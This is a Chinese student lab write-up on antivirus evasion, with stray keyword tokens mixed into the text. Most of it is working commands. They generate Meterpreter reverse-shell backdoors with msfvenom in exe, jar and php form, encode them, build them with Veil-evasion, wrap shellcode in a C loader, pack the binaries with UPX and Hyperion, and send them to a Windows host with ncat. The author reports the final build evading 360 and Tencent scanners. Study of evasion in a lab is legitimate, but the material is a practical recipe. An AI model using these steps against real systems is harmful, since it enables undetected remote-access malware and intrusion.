目录php
(1)杀软是如何检测出恶意代码的?java
(2)免杀是作什么?python
(3)免杀的基本方法有哪些?算法
改变特征码shell
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.19.129 LPORT=5230 -f exe > 20165230_backdoor.exe
放去virscan扫描,结果有点惨,有29个扫描了出来。
编程
编码十次命令以下(用-i参数指定编码次数):vim
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.19.129 LPORT=5230 -f exe > 20165230_back2.exe
再放去扫描,少了1个,但感受没有多大效果。
windows
生成.jar文件夹
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.19.129 lport=5230 x> 20165230_backdoor_java.jar
数组
msfvenom生成php文件:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.19.129 lport=5230 x> 20165230_backdoor.php
安全
下面是学长博客里的正常安装方法:
在Kali终端中使用
sudo apt-get install veil
安装,若遇到问题则用sudo apt-get update
和sudo apt-get upgrade
这两个命令更新一下软件包便可:
以后用veil
命令打开Veil,输入y继续安装直至完成
在终端中使用veil
命令进入应用,输入use evasion
进入veil-evasion
输入use python/meterpreter/rev_tcp.py
,
而后设置回连IP(此处IP是kali)和端口,输入generate
生成文件,接着输入你想要payload的名字:veil_c_5230:
而后生成了可执行文件。
看看Viruscan的扫描结果怎么样,咦还不错,只有15个了!
Linux平台交叉编译Windows应用
使用命令msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.19.129 LPORT=5230 -f c
生成一个c语言格式的shellcode数组
vim shell1.c
命令新建一个c文件,将生成的shellcode粘贴到其中,并在以后添加主函数int main() { int (*func)() = (int(*)())buf; func(); }
i686-w64-mingw32-g++ shell1.c -o shell1.exe
命令生成可执行文件1.在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.19.129 LPORT=5230 -f exe > shell1.exe注意这里的IP地址为控制端IP,即LinuxIP,生成后门程序 2.在Windows下执行ncat.exe -l 5230 > shell1.exe,这样被控主机就进入了接收文件模式 3.在kali中经过nc 192.168.19.128 5230 < shell1.exe将生成的后门程序传送到Windows主机上.注意这里的IP为被控主机IP,即WindowsIP
回连先ping通,而后再作是没有问题的
仍是同样用Viruscan扫描一下
发现并无改进啊!
用-e
指定生成shellcode的编码方式,生成新的shellcodemsfvenom -p windows/meterpreter/reverse_https -e x86/bloxor LHOST=192.168.19.129 -f c
仍是不行!!
接下来我换了N种方式变换了主函数,从新生成了shellcode,不断用ncat在两台虚拟机之间传输exe,依然没用,个人心里是崩溃的
upx是一种压缩程序,能够实现加壳的功能,Kali下输入命令upx shellupx.exe -o shellupx.upxed.exe
:
再去扫一遍,emmmmm,这个壳好像也没用
输入命令wine hyperion.exe -v shell5.upxed.exe shell5.upxed.Hyperion.exe
进行加壳:
再去扫一遍,咦,稍微好了一点点点,不过仍是不要加壳了吧
在经历了N次失败后,已经快要没有信心了,后来我以前相同的代码在主机的Codeblocks编译生成exe,再放去viruscan里扫描 竟然成功了!也太神奇了吧
也没有被杀软杀!360和腾讯管家都开了
再回连一下,OK!!